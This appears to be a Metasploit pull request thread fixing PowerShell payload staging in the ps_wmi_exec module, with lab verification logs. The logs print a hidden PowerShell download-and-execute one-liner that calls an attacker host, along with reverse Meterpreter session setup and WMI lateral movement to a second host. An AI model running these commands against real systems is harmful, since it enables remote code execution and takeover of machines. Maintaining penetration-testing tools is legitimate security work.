Fix issue in ps_wmi_exec and powershell staging

[kaospunk]

The staging function in the post/windows/powershell class was broken
in a previous commit as the definition for env_variable was removed and
env_prefix alone is now used. This caused an error to be thrown when
attempting to stage the payload. This changes the reference from
env_variable to env_prefix.

Additionally, the ps_wmi_exec module created a powershell script to be
run that was intended to be used with the EncodedCommand command line
option; however the script itself was never actually encoded. This
change passes the compressed script to the encode_script function to
resolve that issue.

Verification

• Start msfconsole
• Set up a session on the first Windows host (Such as via web_delivery)
• Attempt to run ps_wmi_exec through the established session against a second Windows host and verify you receive an error
• Switch to fixed branch and start msfconsole
• Set up a session on the first host again
• Attempt to run ps_wmi_exec through the established session against the second Windows host and verify no error is received and a session is established

msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.151.129:8443
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/CTPsxOrvc6Jk
[*] Local IP: http://127.0.0.1:8080/CTPsxOrvc6Jk
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://192.168.151.129:8080/CTPsxOrvc6Jk');
[*] 192.168.151.132  web_delivery - Delivering Payload

Execute the powershell to establish session:
[*] https://192.168.151.129:8443 handling request from 192.168.151.132; (UUID: nesvi3c3) Staging x86 payload (958531 bytes) ...
[*] Meterpreter session 1 opened (192.168.151.129:8443 -> 192.168.151.132:2661) at 2017-04-28 03:06:03 -0400


Attempt to run ps_wmi_exec through the established session and get error:
msf exploit(ps_wmi_exec) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(ps_wmi_exec) > set LHOST 192.168.151.129
LHOST => 192.168.151.129
msf exploit(ps_wmi_exec) > set disablepayloadhandler true
disablepayloadhandler => true
msf exploit(ps_wmi_exec) > set RHOSTS 192.168.151.134
RHOSTS => 192.168.151.134
msf exploit(ps_wmi_exec) > exploit

[-] Exploit failed: NameError undefined local variable or method `env_variable' for #<Msf::Modules::Mod6578706c6f69742f77696e646f77732f6c6f63616c2f70735f776d695f65786563::MetasploitModule:0x005601fd3c1c70>

Switch to fixed branch:
Get session on first host again:
resource (web_delivery)> exploit
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.151.129:8443
[*] Started HTTPS reverse handler on https://0.0.0.0:8443
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/TqwTlIH
[*] Local IP: http://127.0.0.1:8080/TqwTlIH
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://192.168.1.230:8080/TqwTlIH');

[*] https://192.168.1.230:8443 handling request from 192.168.151.132; (UUID: tbqevwu2) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.168.151.129:8443 -> 192.168.151.132:3152) at 2017-04-28 03:11:28 -0400


Attempt to exploit second box again:
msf exploit(web_delivery) > use exploit/windows/local/ps_wmi_exec
msf exploit(ps_wmi_exec) > set SESSION 1
SESSION => 1
msf exploit(ps_wmi_exec) > set RHOSTS 192.168.151.134
RHOSTS => 192.168.151.134
msf exploit(ps_wmi_exec) > set disablepayloadhandler true
disablepayloadhandler => true
msf exploit(ps_wmi_exec) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(ps_wmi_exec) > set LHOST 192.168.151.129
LHOST => 192.168.151.129
msf exploit(ps_wmi_exec) > exploit

[+]  - Bytes remaining: 12448
[+]  - Bytes remaining: 4448
[+] Payload successfully staged.
msf exploit(ps_wmi_exec) > 
[*] https://192.168.1.230:8443 handling request from 192.168.151.134; (UUID: tbqevwu2) Staging x86 payload (958531 bytes) ...
[*] Meterpreter session 2 opened (192.168.151.129:8443 -> 192.168.151.134:50127) at 2017-04-28 03:13:12 -0400

[sempervictus]

@kaospunk: good catch boss - looks like upstream was rather broken. I just looked over the commit history on this stuff in r7/master, looks like there was some strangeness with who committed what, probably as some sort of merge conflict resolution on one of my pathologically stale PRs. We definitely lost a few pieces along the way, and it looks to have been broken for some time now.
Pulled your PR into a running instance from the R7 master branch, and staged a rev_tcp payload via WMI:

[+] [2017.05.10-21:15:26] Successfully launched on 10.71.71.144 with a process id of 1700

[busterb]

@bwatters-r7 this is something good to pull into your test suite

[busterb]

Looks good to me too, thanks @kaospunk

[zeroSteiner]

Got this tested and it looks good to me, so I'll land it here shortly. One thing to note is that the missing variable exception requires that the changes to the ps_wmi_exec.rb file be present. I made one small change to rename env_prefix back to env_variable since it's no longer being used as a prefix but rather the entire variable.

Thanks @kaospunk!

[alrosenthal-r7]

Release Notes

These fixes resolve an issue that prevented staging the payload in the msf/core/post/windows/powershell class and an issue that prevented use of the EncodedCommand command line option with the exploits/windows/local/ps_wmi_exec exploit.